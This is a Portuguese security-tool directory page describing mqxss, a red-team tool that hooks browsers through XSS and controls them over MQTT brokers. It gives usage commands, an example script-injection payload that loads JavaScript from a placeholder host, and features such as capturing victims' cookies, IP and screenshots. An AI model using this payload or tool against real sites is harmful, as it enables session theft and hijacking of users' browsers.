Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mqxss — Comunicação de navegador hooked via MQTT | Kitploit
Ferramentas/GitHubGitHub/grampae/mqxss
Geração de PayloadsExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
GitHubgrampae/mqxss

mqxss

Comunicação de navegador hooked via MQTT

Ver Repositório
8há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

mqxss v0.2

mqxss atua como um cliente para se comunicar com navegadores hookados via MQTT

Screenshot from 2023-07-03 15-15-35

A vantagem de usar isto em vez do beef ou xsshunter é que, além de hospedar o payload js, não há configuração de infraestrutura; você pode usar um broker público (no entanto, atualmente usa ofuscação; criptografia está em andamento).

Os navegadores hookados se comunicarão no tópico MQTT no broker que você especificar; existem muitos brokers públicos/gratuitos para testar isso.

O cliente utiliza a biblioteca python paho.mqtt, enquanto o payload js utiliza 'mqttws31.min.js', que ele obtém daqui 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.


Instruções

Screenshot from 2024-01-17 11-34-59

Para gerar um payload JS para colocar hook em navegadores, defina a flag -g em tempo de execução juntamente com as variáveis de broker, porta e tópico. Isso criará seu payload na pasta /js/.

Para executar o cliente, forneça seu broker, porta e tópico da seguinte forma:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Para executar o cliente com credenciais, forneça seu broker, porta, nome de usuário, senha e tópico da seguinte forma:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Envie seu payload XSS para a vítima enquanto o cliente mqxss está em execução, ex.: '"><script src=https://example.com/x.js async></script> ou algo semelhante; se vulnerável, você deve receber uma notificação informando que o navegador se conectou com alguns detalhes básicos, incluindo cookies etc.

a


Funcionalidades:

  • O payload js utiliza MQTT QoS 1 e Last Will; o mqxss será notificado de desconexões ou conexões que ocorrerem enquanto o cliente não estiver conectado ao broker
  • gerar payload js em tempo de execução para colocar hook em navegadores
  • atualmente só funciona com brokers MQTT que usam websockets seguros
  • abrir a localização do navegador hookado com os cookies capturados no navegador para conveniência
  • quando hookado, captura cookies, IP, tipo de dispositivo e user agent
  • ver navegadores hookados anteriormente (desconectados)
  • enviar js para navegadores atualmente hookados e obter resposta, se disponível
  • captura de tela do navegador hookado
  • definir usuário e senha para brokers que exigem isso em tempo de execução
  • notificação pushover definindo as variáveis ptoken e userkey em mqxss.py e utilizando a flag de linha de comando -po
Baixar ferramenta